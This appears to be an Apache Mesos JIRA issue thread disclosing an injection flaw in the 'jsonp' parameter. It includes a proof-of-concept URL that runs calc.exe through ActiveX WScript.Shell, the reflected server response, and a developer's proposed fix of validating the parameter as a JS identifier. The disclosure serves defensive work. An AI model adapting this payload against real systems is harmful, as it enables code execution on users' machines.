You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@mesos.apache.org by "Alexander Rojas (JIRA)" <ji...@apache.org> on 2017/11/13 23:00:03 UTC

[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

    [ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250448#comment-16250448 ] 

Alexander Rojas commented on MESOS-7826:
----------------------------------------

For backwards compatibility i think it will be a while before we can completely remove the {{jsonp}} parameter from our codebase, however that doesn't mean we cannot mitigate the problem of the possible attacks by properly treating the {{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably parse that {{jsonp}} is just a JS identifier. Apparently just Internet Explorer up to version 11 is vulnerable to this attack.

> XSS in JSONP parameter
> ----------------------
>
>                 Key: MESOS-7826
>                 URL: https://issues.apache.org/jira/browse/MESOS-7826
>             Project: Mesos
>          Issue Type: Bug
>          Components: json api
>         Environment: Running as part of DC/OS in a docker container.
>            Reporter: Vincent Ruijter
>            Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into account the following url: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing the file (state.js), it will pop-up a calculator. It's my recommendation to apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)